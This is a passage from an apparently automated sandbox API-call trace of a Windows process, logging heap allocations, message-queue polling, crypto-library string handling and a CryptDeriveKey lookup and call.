lpMsg=0x8cf3b8) returned 0 [0262.806] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0262.806] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.806] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0262.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0262.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0262.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51e08 [0262.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0262.806] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0262.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0262.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55218 [0262.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0262.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0262.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0262.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0262.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0262.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0262.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0262.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0262.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0262.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0262.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552f8 [0262.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0262.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0262.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0262.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0262.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0262.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0262.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0262.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0262.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0262.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0262.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0262.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0262.808] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0262.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0262.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0262.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51e38 [0262.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0262.808] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0262.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552a8 [0262.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55168 [0262.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0262.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0262.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0262.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0262.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0262.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0262.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55148 [0262.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0262.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0262.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0262.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0262.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0262.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0262.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551c8 [0262.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0262.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0262.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0262.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0262.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0262.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552e8 [0262.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0262.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0262.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551e8 [0262.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0262.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0262.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0262.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55258 [0262.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0262.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0262.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55218 [0262.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0262.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0262.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0262.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55248 [0262.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0262.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0262.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0262.810] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0262.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0262.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0262.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0262.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0262.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0262.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0262.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0262.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0262.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0262.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0262.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0262.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0262.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0262.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0262.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0262.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0262.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0262.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0262.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0262.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0262.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0262.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0262.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0262.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0262.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0262.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0262.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0262.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0262.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0262.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0262.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0262.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0262.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0262.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0262.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0262.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0262.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0262.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0262.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0262.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0262.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0262.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0262.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0262.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0262.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0262.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0262.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0262.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0262.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0262.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0262.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0262.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0262.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0262.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0262.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0262.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0262.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0262.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0262.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51bc8 [0262.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51bc8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0262.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0262.852] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0262.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0262.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0262.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0262.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0262.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0262.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0262.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0262.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0262.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0262.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0262.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0262.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0262.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0262.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0262.853] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87250, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87310) returned 1 [0262.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0262.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0262.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0262.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0262.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0262.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0262.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0262.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0262.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0262.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0262.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0262.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0262.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0262.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0262.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0262.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0262.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0262.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0262.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0262.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0262.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0262.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0262.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0262.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0262.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0262.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0262.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0262.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0262.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52138 | out: hHeap=0x970000) returned 1 [0262.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0262.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0262.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0262.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0262.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fb8 [0262.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0262.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fb8 | out: hHeap=0x970000) returned 1 [0262.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0262.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0262.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0262.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52030 [0262.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52048 [0262.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0262.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52048 | out: hHeap=0x970000) returned 1 [0262.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0262.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52030 | out: hHeap=0x970000) returned 1 [0262.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0262.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0262.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0262.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0262.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0262.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0262.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0262.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0262.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0262.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0262.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0262.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0262.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552c8 [0262.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0262.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55118 [0262.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0262.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55308 [0262.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 